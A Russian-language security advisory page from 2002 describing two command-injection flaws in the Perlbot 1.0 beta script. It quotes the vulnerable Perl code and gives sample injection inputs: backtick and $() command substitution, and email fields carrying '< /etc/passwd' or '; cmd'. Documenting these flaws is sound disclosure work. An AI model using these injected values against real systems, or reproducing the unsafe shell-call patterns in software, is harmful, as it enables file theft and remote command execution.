Выполнение произвольных команд в Perlbot

Дата публикации:
21.10.2002
Всего просмотров:
892
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: В программе Perlbot (www.perlbot.com) обнаружено 2 уязвимости:

1. Из-за недостаточной фильтрации ввода пользователя, Perlbot сценарий может использоваться для выполнения произвольных команд, с привилегиями Web сервера. Проблема находится в следующем коде:

foreach(`/bin/echo "$word" | /usr/local/bin/ispell -a`)

Команды могут задаваться следующим образом: `cmd`, $(cmd) или \xxx, где xxx – восьмеричное значение любого символа.

2. Из-за недостаточной фильтрации и неправильного вызова open(), когда сценарий пытается послать электронное сообщение, можно выполнить произвольные команды. Проблема находится в следующем коде:

open (MAIL,"| $sendmail $recipient") || die $!;

E-mail адрес, типа hacker@scan-associates.net < /etc/passwd позволяет читать произвольные файлы на системе пользователя. E-mail адрес, hacker@scan-associates.net ; cmd – позволяет выполнять произвольные команды.

Уязвимость обнаружена в Perlbot 1.0 beta

Ссылки: SCAN Associates Advisory: madhater perlbot 1.0 beta - Remote Command Execution

или введите имя

CAPTCHA